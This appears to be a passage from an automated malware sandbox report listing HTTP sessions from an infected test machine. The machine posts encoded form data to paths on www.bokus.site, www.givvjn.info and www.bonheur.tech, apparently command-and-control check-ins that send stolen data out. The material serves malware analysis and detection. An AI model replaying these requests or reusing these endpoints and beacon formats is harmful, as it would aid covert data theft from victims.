                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          59192.168.11.2049804199.192.21.16980
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:51:39.351360083 CET809OUTPOST /qps0/ HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bokus.site
                                                                          Referer: http://www.bokus.site/qps0/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 72 74 71 41 71 39 73 78 6b 5a 33 6d 68 73 56 38 32 37 69 45 67 79 79 4d 6b 4b 53 6f 6c 36 4f 32 73 61 69 4f 35 63 78 72 64 2b 49 58 5a 50 78 31 4e 56 44 35 31 35 4c 6c 44 6d 34 43 79 32 5a 4d 66 6b 37 57 66 33 66 38 41 62 37 4c 4f 6e 42 2b 56 30 50 46 32 64 6a 68 68 4e 55 38 71 76 2b 51 48 56 63 59 4f 44 48 59 54 31 67 6e 72 47 71 4b 75 4f 34 41 37 45 31 6e 6c 31 62 75 48 69 32 75 78 74 65 44 74 33 43 50 52 48 50 65 65 54 2b 5a 6d 48 66 4b 64 61 79 45 45 61 62 77 41 75 6b 31 72 62 64 49 41 7a 2f 5a 35 7a 51 7a 49 3d
                                                                          Data Ascii: lV=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSrtqAq9sxkZ3mhsV827iEgyyMkKSol6O2saiO5cxrd+IXZPx1NVD515LlDm4Cy2ZMfk7Wf3f8Ab7LOnB+V0PF2djhhNU8qv+QHVcYODHYT1gnrGqKuO4A7E1nl1buHi2uxteDt3CPRHPeeT+ZmHfKdayEEabwAuk1rbdIAz/Z5zQzI=
                                                                          Jan 9, 2025 16:51:39.544110060 CET918INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:39 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          60192.168.11.2049805199.192.21.16980
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:51:42.056781054 CET1289OUTPOST /qps0/ HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.bokus.site
                                                                          Referer: http://www.bokus.site/qps0/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 6a 74 71 31 6d 39 6a 77 6b 5a 32 6d 68 73 57 38 32 41 69 45 67 76 79 4d 38 4f 53 6f 67 42 4f 7a 67 61 6a 6f 74 63 77 5a 31 2b 53 48 5a 50 73 46 4e 57 4a 5a 30 37 4c 6c 7a 69 34 42 61 32 5a 4d 66 6b 37 55 58 33 4a 65 6b 62 30 72 4f 6b 49 65 56 6f 59 31 32 35 6a 6e 49 34 55 38 2f 61 2b 68 37 56 64 34 65 44 46 72 37 31 38 33 72 45 74 4b 75 57 34 41 33 48 31 6e 70 66 62 74 62 59 32 74 68 74 65 6c 30 38 48 64 49 59 52 50 44 66 34 34 47 37 66 4c 70 2b 7a 32 59 66 62 77 67 46 39 41 76 4f 44 2b 41 49 37 4c 5a 37 54 47 42 4f 69 44 34 61 53 4e 4e 4a 43 39 2b 54 54 4c 68 6a 38 4a 34 47 56 4e 32 55 74 75 74 44 38 4b 78 48 4b 52 4e 33 4b 78 45 63 48 62 67 65 69 32 2b 33 62 4c 50 79 50 48 38 50 57 62 4e 4b 46 6c 59 38 30 5a 6f 65 42 42 4e 62 54 77 34 71 68 73 6e 69 53 37 74 38 33 73 41 34 45 6d 50 4a 54 53 31 76 4d 63 58 6a 6a 78 69 72 76 68 38 45 62 6b 72 51 6f 39 71 35 69 7a 57 [TRUNCATED]
                                                                          Data Ascii: lV=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSjtq1m9jwkZ2mhsW82AiEgvyM8OSogBOzgajotcwZ1+SHZPsFNWJZ07Llzi4Ba2ZMfk7UX3Jekb0rOkIeVoY125jnI4U8/a+h7Vd4eDFr7183rEtKuW4A3H1npfbtbY2thtel08HdIYRPDf44G7fLp+z2YfbwgF9AvOD+AI7LZ7TGBOiD4aSNNJC9+TTLhj8J4GVN2UtutD8KxHKRN3KxEcHbgei2+3bLPyPH8PWbNKFlY80ZoeBBNbTw4qhsniS7t83sA4EmPJTS1vMcXjjxirvh8EbkrQo9q5izW026YBV+a0eZTa5Gs4rwJ6Fl0UACMH0Dxw/Mo14s26X9Wvlq2w9L7kbvLEfaA9vELxYMKGHFX9VBnF0Y/rasbCSYe7NGYCzWbjOoOZiSIUgmYCXTUMec7Akv0IObf7p00fvMw084JAUjGjYA3+riLnwkO0kcaDekzygDHv6O5JtKIAq2vGtqYLGoyKLfqyu5E2qxqgOdpw10+X8BiG4OSeZZ1oLHMnCss21407VRW2+xGpvaIiWWuA+OIMeph4TiMETcMgXQtB9WxJvpzaotAi86271PilkISdxdBsBEg8cp69KMK9qghrB66gWLyp6+Ou9PEq8FZt1odZbYyjuFMCqGkPiFI0+j6dzyFt1rc
                                                                          Jan 9, 2025 16:51:42.056830883 CET2578OUTData Raw: 4a 56 50 4b 77 4e 2b 6d 50 59 6c 62 4a 50 77 72 47 47 31 6d 68 37 38 51 42 6e 42 58 77 6b 73 52 57 76 58 36 34 45 76 71 34 61 6b 62 41 78 78 2b 4b 2f 4b 78 68 66 6a 6f 65 76 58 59 62 4c 5a 2f 30 42 32 45 70 63 64 58 68 32 7a 66 69 30 42 69 2b 30
                                                                          Data Ascii: JVPKwN+mPYlbJPwrGG1mh78QBnBXwksRWvX64Evq4akbAxx+K/KxhfjoevXYbLZ/0B2EpcdXh2zfi0Bi+0sRRp7J2YVojieH8H86+fqcIqqH6i0KFGuZ5BJgYuFFqr6XyJfU49ZwNPKfXtBakHFytUH5lZs1rqHtEObtOMAu/zTHMVWVa0ogY+7WI+k0VZq2Rh+I9pjLxOu48XR+sK++jKEcRxCCDzVlZ7Q/Thp7ENniqFFfapU
                                                                          Jan 9, 2025 16:51:42.056884050 CET4091OUTData Raw: 44 69 32 62 34 4d 66 75 4e 55 6c 46 68 46 45 54 4f 64 71 54 6d 5a 57 43 6f 52 79 4d 38 47 6c 51 4a 6c 38 6c 2b 64 50 63 79 37 6a 63 56 69 47 77 34 77 45 41 49 45 2b 49 48 46 6f 6a 44 38 4f 6b 49 33 4f 6d 31 4b 77 57 79 6b 77 4e 57 4f 45 55 68 55
                                                                          Data Ascii: Di2b4MfuNUlFhFETOdqTmZWCoRyM8GlQJl8l+dPcy7jcViGw4wEAIE+IHFojD8OkI3Om1KwWykwNWOEUhUAQw8Ptp3yKO5q5KyRIOlUirOzAXUSc80ZeZI/KC3kUxdr38qxiO0WHrHHM6D1IAarJSBqHN32ATbikmjbWam+t0/8SLrBjC/m5nZODgSzwFCtR6spZ9KYV+K1zX21ahjyri6hyQmOZHCQnFvm4DK694IZOQBhm/M2
                                                                          Jan 9, 2025 16:51:42.254570007 CET918INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:42 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          61192.168.11.2049806199.192.21.16980
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:51:44.757000923 CET528OUTGET /qps0/?lV=oe/Nf5ZxPavzyNCK1vJM2Ozzw7iHMrsFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2gmVOP/g7WXCZMIn3pc=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.bokus.site
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:51:44.941435099 CET933INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:51:44 GMT
                                                                          Server: Apache
                                                                          Content-Length: 774
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          62192.168.11.204980747.83.1.9080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:51:58.437582970 CET792OUTPOST /nkmx/ HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.givvjn.info
                                                                          Referer: http://www.givvjn.info/nkmx/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 44 71 4f 73 54 55 66 46 65 6a 79 37 35 43 77 54 35 41 39 45 73 5a 7a 53 70 32 59 68 49 71 6b 70 43 55 75 4c 76 33 65 2b 7a 61 6b 72 30 39 67 4f 34 35 49 72 4e 62 6c 48 6b 78 66 31 75 77 56 61 73 4c 45 58 52 49 4b 66 42 64 76 4b 59 63 72 47 37 7a 49 39 6d 44 55 49 76 4f 30 71 48 74 4c 38 45 6b 43 5a 56 77 4c 76 4f 4c 4c 2b 67 4f 50 51 37 44 6f 30 33 34 31 2b 6f 53 31 7a 31 78 6d 4d 75 57 47 42 77 4b 78 58 48 72 42 41 44 6f 65 50 6f 39 57 38 58 75 38 52 71 4d 57 38 71 2b 6b 69 51 36 74 45 4b 62 36 65 41 75 4f 71 6d 4c 42 72 6e 63 57 42 4e 41 3d 3d
                                                                          Data Ascii: lV=TW4HYQMdIKn0DqOsTUfFejy75CwT5A9EsZzSp2YhIqkpCUuLv3e+zakr09gO45IrNblHkxf1uwVasLEXRIKfBdvKYcrG7zI9mDUIvO0qHtL8EkCZVwLvOLL+gOPQ7Do0341+oS1z1xmMuWGBwKxXHrBADoePo9W8Xu8RqMW8q+kiQ6tEKb6eAuOqmLBrncWBNA==
                                                                          Jan 9, 2025 16:51:59.430126905 CET137INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:51:59 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          63192.168.11.204980847.83.1.9080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:01.270879030 CET812OUTPOST /nkmx/ HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.givvjn.info
                                                                          Referer: http://www.givvjn.info/nkmx/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 51 70 43 78 53 4c 75 31 32 2b 32 61 6b 72 38 64 67 50 6c 70 49 77 4e 62 59 6b 6b 31 58 31 75 77 78 61 73 4b 30 58 52 2f 2b 59 48 4e 76 49 55 38 72 45 2f 7a 49 39 6d 44 55 49 76 50 51 41 48 74 44 38 44 55 79 5a 58 53 7a 73 52 37 4c 68 6a 4f 50 51 74 7a 6f 77 33 34 31 63 6f 58 73 57 31 7a 4f 4d 75 54 69 42 78 59 4a 49 4f 72 42 4b 4d 49 66 4c 6b 34 7a 70 62 4e 77 6c 71 71 61 59 72 73 59 49 63 4d 67 65 58 70 4f 36 44 39 53 59 69 37 34 44 6c 65 58 61 51 45 59 64 46 41 48 36 4d 63 6a 38 68 46 52 67 4c 4c 46 4e 32 68 55 3d
                                                                          Data Ascii: lV=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYQpCxSLu12+2akr8dgPlpIwNbYkk1X1uwxasK0XR/+YHNvIU8rE/zI9mDUIvPQAHtD8DUyZXSzsR7LhjOPQtzow341coXsW1zOMuTiBxYJIOrBKMIfLk4zpbNwlqqaYrsYIcMgeXpO6D9SYi74DleXaQEYdFAH6Mcj8hFRgLLFN2hU=
                                                                          Jan 9, 2025 16:52:02.291054010 CET137INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:52:02 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          64192.168.11.204980947.83.1.9080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:04.110891104 CET2578OUTPOST /nkmx/ HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.givvjn.info
                                                                          Referer: http://www.givvjn.info/nkmx/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 49 70 43 44 4b 4c 76 55 32 2b 78 61 6b 72 39 64 67 53 6c 70 4a 79 4e 62 41 34 6b 31 54 4c 75 79 5a 61 6a 49 38 58 42 4f 2b 59 4f 4e 76 49 63 63 72 42 37 7a 49 6f 6d 44 45 4d 76 4f 67 41 48 74 44 38 44 58 71 5a 54 41 4c 73 4b 37 4c 2b 67 4f 50 6d 37 44 6f 59 33 38 67 72 6f 58 59 73 31 43 75 4d 75 7a 53 42 7a 72 78 49 4d 4c 42 4d 46 59 66 74 6b 34 32 35 62 4e 73 44 71 76 4f 69 72 72 6b 49 4e 61 42 71 48 39 48 73 57 65 36 62 2f 34 73 37 7a 74 33 79 4e 47 68 6a 55 53 58 42 54 36 66 4c 75 48 56 33 62 4f 70 61 76 68 30 68 53 55 63 39 4c 4e 51 59 42 62 46 58 4b 4f 65 5a 64 46 32 48 76 73 5a 78 67 44 76 4e 62 2b 4e 41 55 33 4e 64 51 38 30 55 49 63 6c 37 4f 73 72 73 73 74 5a 49 5a 62 6f 51 6b 37 68 52 51 46 66 71 37 31 53 47 4f 34 74 52 47 70 59 72 34 41 41 76 4a 59 42 37 6b 45 4c 74 4c 52 66 38 73 63 2f 58 4b 7a 50 4a 67 55 32 63 52 43 49 30 48 6c 56 6c 64 6f 4b 59 76 4a 43 [TRUNCATED]
                                                                          Data Ascii: lV=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYIpCDKLvU2+xakr9dgSlpJyNbA4k1TLuyZajI8XBO+YONvIccrB7zIomDEMvOgAHtD8DXqZTALsK7L+gOPm7DoY38groXYs1CuMuzSBzrxIMLBMFYftk425bNsDqvOirrkINaBqH9HsWe6b/4s7zt3yNGhjUSXBT6fLuHV3bOpavh0hSUc9LNQYBbFXKOeZdF2HvsZxgDvNb+NAU3NdQ80UIcl7OsrsstZIZboQk7hRQFfq71SGO4tRGpYr4AAvJYB7kELtLRf8sc/XKzPJgU2cRCI0HlVldoKYvJCtlS7eWmt6rdghCkHY8hWAO4inU3/up73InoWYO1ZzU+wqvmDpkbQoRPPgKKzA/R2QqpCgxC8k6PWIr6GaZjmEjPhwRWlJt5JuoCrKcEpG6E1S4QxFCJvR9eYcvksT2G9m0zhhbkeYwm4faEMMMWchO1RKXRaGVfFomGfn6KgdUHFnQ3fnT+ZXl3JGwacKEQpzerZp+HrTvTz/U5qWVZA2LzbaUR8gHzeQnEWY430fZ0x+s1TirXALCgy2udthlheVtPTzz7z1lezsxt6UZsXlbQVTNJ5Q+B2eh3Jhi/rgCJVOE4slw9vew3dB/ZHtZn/7z+p1hdSn0oCJ4bMgDqh3Bzz2GWSQaYfducim0oFunMSBJs3IDRwYtUQTSmLmsR+C73u4trTk9BMwkdoW6J0A2PdOHT5q6qYHW5YJQ1p0FsQ2jVNNmaTNdIjVECmxlrwBqER1dS+tGtaqSXWeSu6UEP0VEvcVYt9oJWoDJQieVA24aiehWmTjRW/bVvZsjAzLWT3mI3U4Gimd2yINu82cVe45mqtIUBTDRGugBbJTR11wYsdI1YTWNnqLa5VI4QC+c3UCeyzy19RfDTl3Ooix/Ls5WI7J/+8r0z3o+Hmaa/s7hgUQpiZ2uH9ZPd6P9DVz/A8eovQ0AE4e63FNkxtIc+qXaDDe7j8r+ [TRUNCATED]
                                                                          Jan 9, 2025 16:52:04.110974073 CET5383OUTData Raw: 78 31 43 43 35 43 4c 59 30 53 66 4b 75 38 6f 49 72 6e 6d 35 32 36 59 70 4f 58 43 44 32 36 36 59 33 31 4d 35 70 51 42 4e 79 4c 77 50 6e 56 5a 61 68 56 4b 35 6e 65 4a 73 63 77 47 4b 54 50 61 6b 61 4a 35 41 65 54 6a 64 67 4a 49 57 64 45 56 32 33 52
                                                                          Data Ascii: x1CC5CLY0SfKu8oIrnm526YpOXCD266Y31M5pQBNyLwPnVZahVK5neJscwGKTPakaJ5AeTjdgJIWdEV23RLIDCVcroa9Ny/AEEt42oOcxCZuEZo4aX0BNRSHBByKWCDNZLG0CaxFBXO1FfpYjyV7gJBssljeqMgirhxwwvWLyQORtnarNab21QtoDfj2V0oYqFGBY0Baiw7KtowndhyNXrFs3RIonc4I+x7556bZQ3AvTCtcpgu
                                                                          Jan 9, 2025 16:52:05.101855993 CET137INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:52:04 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          65192.168.11.204981047.83.1.9080
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:06.955643892 CET529OUTGET /nkmx/?lV=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.givvjn.info
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:52:07.952403069 CET139INHTTP/1.1 567 unknown
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 09 Jan 2025 15:52:07 GMT
                                                                          Content-Length: 17
                                                                          Connection: close
                                                                          Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                          Data Ascii: Request too large


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          66192.168.11.204981176.223.54.14680
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:52:14.120506048 CET795OUTPOST /t3iv/ HTTP/1.1
                                                                          Host: www.bonheur.tech
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
